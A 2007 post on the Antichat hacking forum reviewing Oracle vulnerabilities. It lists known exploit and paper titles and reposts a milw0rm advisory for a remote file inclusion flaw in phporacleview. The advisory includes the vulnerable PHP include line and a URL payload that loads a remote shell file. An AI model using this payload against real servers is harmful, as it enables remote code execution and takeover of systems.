ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу [Обзор уязвимостей] Oracle
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

[Обзор уязвимостей] Oracle
  #1  
Старый 24.11.2007, 03:14
Аватар для Solide Snake
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
Wink [Обзор уязвимостей] Oracle
Обзор уязвимостей Oracle



Exploits:

Oracle (oidldapd connect) Local Command Line Overflow Exploit
Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit
Oracle Database Server <= 10.1.0.2 Buffer Overflow Exploit
Oracle Database PL/SQL Statement Multiple SQL Injection Exploits
Oracle 9.2.0.1 Universal XDB HTTP Pass Overflow Exploit
Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit
Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit
Oracle <= 9i / 10g (extproc) Local/Remote Command Execution Exploit
Oracle <= 9i / 10g File System Access via utl_file Exploit
Oracle 10g SYS.KUPW$WORKER.MAIN PL/SQL Injection Exploit
Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit
Oracle 9i/10g DBMS_EXPORT_EXTENSION SQL Injection Exploit
Oracle 10g KUPW$WORKER.MAIN Grant/Revoke dba Permission Exploit
Oracle 10g KUPV$FT.ATTACH_JOB Grant/Revoke dba Permission Exploit
Oracle 9i/10g DBMS_METADATA.GET_DDL SQL Injection Exploit
Oracle 9i/10g ACTIVATE_SUBSCRIPTION SQL Injection Exploit
Oracle 10g KUPW$WORKER.MAIN SQL Injection Exploit v2
Oracle 10g KUPV$FT.ATTACH_JOB SQL Injection Exploit v2
Oracle 9i/10g DBMS_METADATA.GET_DDL SQL Injection Exploit v2
Oracle 9i/10g ACTIVATE_SUBSCRIPTION SQL Injection Exploit v2
Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit v2
Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
Oracle 9i/10g evil views Change Passwords Exploit (CVE-2007-3855)
Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit
Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit
Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit (2)
Oracle 10g LT.FINDRICSET Local SQL Injection Exploit (IDS evasion)

Papers:

Bypassing Oracle dbms_assert
Dangling Cursor Snarfing: A New Class of Attack in Oracle
Oracle Forensics Part 4: Live Response
Oracle Forensics Part 3: Isolating Evidence of Attacks
Oracle Forensics Part 2: Locating Dropped Objects
Oracle Forensics Part 1: Dissecting the Redo Logs
Oracle Forensics Part 5: Finding Evidence of Data Theft in the Absence ..



===============================
phporacleview => (page_dir) Remote File Inclusion Exploit
===============================

Discoverd By : Alkomandoz Hacker


HomePge= Asb-May.Net & Mohandko.com & Sniper-sa.com & Tryag.com

================================

Script Name: phporacleview

Download Script: http://webxadmin.free.fr/download/phporacleview.zip


=================================
Bug in :

Цитата:
phporacleview/inc/include_all.inc.php
=======

Код:
<?
include($page_dir . $inc_dir . "config.inc.php");
==================================


Exploit :
--------------------------------

Код:
http://localhost/phporacleview/inc/include_all.inc.php?page_dir=http://Shell.txt?
===================================

milw0rm.com
Последний раз редактировалось Solide Snake; 28.11.2007 в 23:17..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Перевод: Анатомия Oracle Часть 4: Live Response Robin_Hood Чужие Статьи 2 12.11.2007 21:22
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ